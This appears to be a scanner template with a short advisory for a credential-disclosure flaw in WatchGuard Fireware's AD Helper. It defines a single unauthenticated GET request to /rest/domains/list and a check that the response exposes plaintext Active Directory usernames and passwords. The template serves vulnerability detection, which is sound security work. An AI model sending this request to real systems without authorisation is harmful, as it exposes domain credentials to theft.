WatchGuard Fireware Threat Detection and Response (TDR) service contains a credential-disclosure vulnerability in the AD Helper component that allows unauthenticated attackers to gain Active Directory credentials for a Windows domain in plaintext.
PoC代码[已公开]
id: watchguard-credentials-disclosure
info:
name: WatchGuard Fireware AD Helper Component - Credentials Disclosure
author: gy741
severity: critical
description: WatchGuard Fireware Threat Detection and Response (TDR) service contains a credential-disclosure vulnerability in the AD Helper component that allows unauthenticated attackers to gain Active Directory credentials for a Windows domain in plaintext.
reference:
- https://www.exploit-db.com/exploits/48203
- https://www.watchguard.com/wgrd-blog/tdr-ad-helper-credential-disclosure-vulnerability
rules:
r0:
request:
method: GET
path: /rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc
expression: response.status == 200 && response.body.bcontains(b'"fullyQualifiedName"') && response.body.bcontains(b'"logonDomain"') && response.body.bcontains(b'"username"') && response.body.bcontains(b'"password"')
expression: r0()